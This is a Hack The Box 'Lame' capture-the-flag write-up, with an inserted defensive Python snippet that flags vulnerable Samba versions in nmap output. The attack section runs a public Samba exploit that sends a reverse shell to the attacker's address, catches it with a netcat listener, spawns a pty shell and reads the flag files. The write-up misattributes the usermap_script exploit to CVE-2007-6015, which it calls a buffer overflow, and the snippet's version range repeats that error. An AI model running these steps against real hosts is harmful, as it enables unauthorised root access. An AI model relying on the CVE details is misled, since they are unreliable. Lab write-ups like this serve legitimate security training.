Created by ch4p // 10.10.10.3
// Enumeration //
Lame was the first machine published on Hack The Box, and it is a very simple boot-to-root box. I'll be kicking things off with an nmap scan, grabbing open ports and service versions. The syntax below runs a TCP connect scan on all 65,535 ports, runs all the default NSE scripts, and verbosely prints out its status.
nmap -Pn -A -p- -v 10.10.10.3
It may take a few minutes, but you should get output similar to the photo above. The two main takeaways are vsftpd (ver 2.3.4) running on port 21, and Samba (ver 3.0.20) on ports 139 and 445. Let's use smbmap to take a deeper look at the Samba service.
smbmap -H 10.10.10.3
For those of you unfamiliar with it, Samba is a suite of interoperability utilities that lets Linux machines function in an Active Directory environment using the SMB/CIFS protocol. According to our output, we have read and write access to the tmp share.
A quick Google search returns CVE-2007-6015, a buffer overflow affecting Samba versions 3.0.0 – 3.0.27a that allows unauthenticated remote users to execute arbitrary code. Note that there are numerous public exploits for this service and version; I recommend filtering by score.
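As an added example that is not part of the original writeup, here is a small Python check of the kind a defender would run over scan output: it reads nmap -sV port lines and flags any Samba build whose exact version falls inside the 3.0.0 – 3.0.27a range cited above, while skipping fuzzy versions such as "3.X - 4.X" that nmap prints when it cannot fingerprint a release. The AFFECTED table and the sample nmap lines are constructed for this example.

```python
import re

# Inclusive version range the writeup cites for CVE-2007-6015; constructed table,
# keyed by the product string nmap prints in its VERSION column.
AFFECTED = {"Samba smbd": [("CVE-2007-6015", "3.0.0", "3.0.27a")]}

# Constructed sample of nmap -sV port lines, modelled on what the scan above prints.
SAMPLE_NMAP = """\
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""

PORT_LINE = re.compile(r"^(\d+/(?:tcp|udp))\s+open\s+\S+\s+(.*)$")
VERSION = re.compile(r"^(\d+)\.(\d+)\.(\d+)([a-z]?)$")

def parse_version(text):
    """'3.0.27a' -> (3, 0, 27, 'a'); the letter suffix sorts after the bare release."""
    m = VERSION.match(text)
    if not m:
        raise ValueError("unsupported version string: %r" % text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4))

def in_range(version, low, high):
    """Inclusive comparison on parsed tuples, so 3.0.27 <= 3.0.27a < 3.0.28."""
    return parse_version(low) <= parse_version(version) <= parse_version(high)

def flag_services(nmap_text):
    """Return (port, product, version, advisory) for every port line whose exact
    version falls in an affected range; fuzzy versions like '3.X - 4.X' are skipped."""
    hits = []
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue
        port, info = m.groups()
        for product, ranges in AFFECTED.items():
            vm = re.match(re.escape(product) + r"\s+(\d+\.\d+\.\d+[a-z]?)\b", info)
            if not vm:
                continue
            for advisory, low, high in ranges:
                if in_range(vm.group(1), low, high):
                    hits.append((port, product, vm.group(1), advisory))
    return hits

if __name__ == "__main__":
    for port, product, version, advisory in flag_services(SAMPLE_NMAP):
        print(port, product, version, "falls in the range affected by", advisory)
```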
// Exploitation //
A Metasploit module does exist for this CVE, but first, let's do it without. Going back to trusty Google and searching for CVE-2007-6015 turns up a well-written and documented Python script created by amriunix that should do the trick.
python usermap_script.py 10.10.10.3 139 10.10.10.x 2901
Clone the script, substitute your own IP for the x, and you're ready to have a good time. You'll need a netcat listener to catch the shell.
nc -lvnp 2901
We have a shell, and it's running as root. A raw netcat shell isn't the most useful, so we'll see if we can spawn a slightly better one using Python.
python -c 'import pty; pty.spawn("/bin/sh")'
From here, we're already root, so it's a simple matter of grabbing the flags from the root and user directories.
cat /root/root.txt
cat /home/makis/user.txt
Or we can do all of this the lazy way. Fire up Metasploit, and let's point and click.